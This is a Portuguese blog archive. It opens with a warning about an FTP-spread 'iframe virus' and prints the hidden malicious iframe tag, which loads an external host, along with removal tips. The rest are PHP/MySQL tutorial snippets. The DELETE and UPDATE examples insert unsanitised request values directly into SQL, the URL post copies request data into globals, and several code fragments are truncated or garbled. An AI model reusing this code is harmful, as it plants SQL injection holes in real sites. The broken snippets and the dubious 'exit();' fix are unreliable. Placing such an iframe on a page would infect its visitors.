Web

Vírus Iframe, um trojan hacker que infecta seu site, blog ou página pelo FTP.

devinternet — Thu, 16 Jul 2009 14:16:20 +0000

Vírus Iframe, um trojan hacker que infecta seu site, blog ou página pelo FTP. Uma linha de código dentro do html que carrega um vírus para o usuário, alguns anti-vírus conseguem detectar e apenas fecha a página, sem mostrar o conteúdo do site e ainda, sem matar o vírus.

Um novo vírus está se espalhando pela Internet, não por email como antigamente’, mas sim pelo código-fonte dos sites da Web. Para descobrir se sua página tem esse vírus, clique em com o botão direito na página e vá em Exibir código fonte, aí dentro digite ctrl + f e busque por iframe. Se aparecer algo como este abaixo, parabéns, você é mais um contemplado nesta nova praga.

iframe src="http://untlexy.net/?click=A0A0A0" width=1 height=1 style="visibility:hidden;position:absolute">

Não vou elogiar a criatividade dos criadores de vírus, parece que só agora eles descobriram a tag Iframe. Este código traz uma Url qualquer, pode ser uma página dentro ou fora do servidor do site. Um elemento Html antes muito usado, está caindo da biblioteca dos programadores depois do Ajax. Este iframe usado de má fé, traz um código css dentro do atributo Style, que esconde o conteúdo, ou seja, não traz nenhuma modificação na parte visual do site infectado, e mesmo assim continua executando o conteudo do url, que é um script que tenta instalar um vírus na máquina do usuário.

Como remover este vírus:

abra os arquivos index.php em seu site e remova a linha com o código.
passe o antivírus em sua máquina
não salve as senhas nos programas de ftp, ex.: dreamweaver
use o código exit(); no final do arquivo php

Quando usamos o código exit(); no final do arquivo, impedimos que apareça a tag do vírus, mesmo que ele esteja dentro do código.

No WordPress ele infecta:

index.php
wp-admin/index.php
wp-content/themes/seutema/index.php
wp-content/themes/seutema/home.php

Encontrei pouca documentação interessante sobre isto, quase nada para ser sincero, acredito que ele rouba as senhas do blog, do ftp e ainda instala um trojan. Quem tem um bom antivírus não consegue vizualizar a página.

Caso tenha alguma dúvida ou sugestão comente abaixo.

Publicado emProgramação Web Tagged: blog, iframe, site, virus

PHP e MySql: Apagar Dados

devinternet — Sat, 09 Feb 2008 18:11:06 +0000

 < ?php
$query = "DELETE FROM `tabela` WHERE id='$_GET[id]'";
$deleta = mysql_query($query) or print(mysql_error());
header("Location: pagina.php");
exit;
?>

PHP e MySql: Editar Dados

devinternet — Sat, 09 Feb 2008 18:10:21 +0000

< ?php
$sql = "UPDATE `tabela` SET `coluna`='$dado' WHERE `id`='$id'";
$atualiza = mysql_query( $sql ) or print( mysql_error() );
header("Location: pagina.php");
exit;
?>

PHP e Mysql: Adicionar ao Banco de Dados

devinternet — Sat, 09 Feb 2008 18:09:16 +0000

< ?php include("../src/conectar.php"); ?>
< ?
$data =  date("Y-m-d H:i:s");
$titulo = htmlentities($_POST['titulo']);
$texto = htmlentities($_POST['texto']);
$tabela = "conteudo";
$campos = "datahora, titulo, texto";
$dados = "'$data', '$titulo', '$texto'";
$query = "INSERT INTO ".$tabela." (".$campos.") VALUES (".$dados.")";
$sql = mysql_query($query) or print(mysql_error());

header("Location: pagina.php"); /* Redirect browser */

/* Make sure that code below does not get executed when we redirect. */
exit;
?>

URL 2.0

devinternet — Fri, 08 Feb 2008 10:59:55 +0000

.htaccess

DirectoryIndex ./index.php
IndexIgnore */*
RewriteEngine On
RewriteBase /
RewriteRule ^([0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?([0-9a-zA-Z_]*[\/]?[0-9a-zA-Z_]*)[\/]?$ http://www.exemplo.com.br/index.php?option=$1&1=$2&2=$3&3=$4&4=$5&5=$6&6=$7&7=$8&8=$9
AddType image/gif .jpg

index.php

 ""){
   $GLOBALS[$var_str[0]] = $var_str[1];
  }
 $i++;
}
unset($i,$var_str);
$option = $_GET["option"];
?>

Validar formulário em Javascript

devinternet — Thu, 07 Feb 2008 16:03:02 +0000

Listar somente arquivo mp3

devinternet — Wed, 06 Feb 2008 20:37:46 +0000

\n";
while (false !== ($entry = $d->read())) {
if((substr($entry, -3) == "MP3") || (substr($entry, -3) == "mp3")) {
$url = htmlentities($entry);
$file = rawurlencode($entry);
echo "";
echo "";
echo $url;
echo "";
echo "\n";
}
}
echo "\n";
$d->close();
?>

Função para listar diretórios.

Na linha 6 está restrito apenas para arquivos no formato MP3, pode ser mudado para jpg, gif ou qualquer extensão. Não lê o mime-type, apenas usa a função substr, que retira as últimas três letras para identificar com a extensão do arquivo.
Na linha 7 a função htmlentities trabalha com os caracteres especiais.
Na linha 8 a função rawurlencode converte os acentos e caracteres especiais para usarmos na url do arquivo.

Retirar acentos e caracteres especiais

devinternet — Wed, 06 Feb 2008 20:17:36 +0000

Script retira acentos e caracteres especiais, depois converte para minúsculas. Útil para arquivos e url.

PHP: Retornar uma parte de uma string com as palavras inteiras

devinternet — Wed, 06 Feb 2008 16:44:37 +0000

< ?
$frase = "China defende novas regras para áudio e vídeo na internet";
$divide = explode(" ", $frase);
$total = count( $divide );
$soma = 0;
$palavras = 4;
for ($i = 0; $i < $total; $i++) {
$f = $divide[$i];
$len = strlen($f);
$soma = $soma + intval($len);
$soma ++;
if($i >= $palavras)break;
}
echo substr($frase, 0, $soma);
?>

Retorna:

China defende novas regras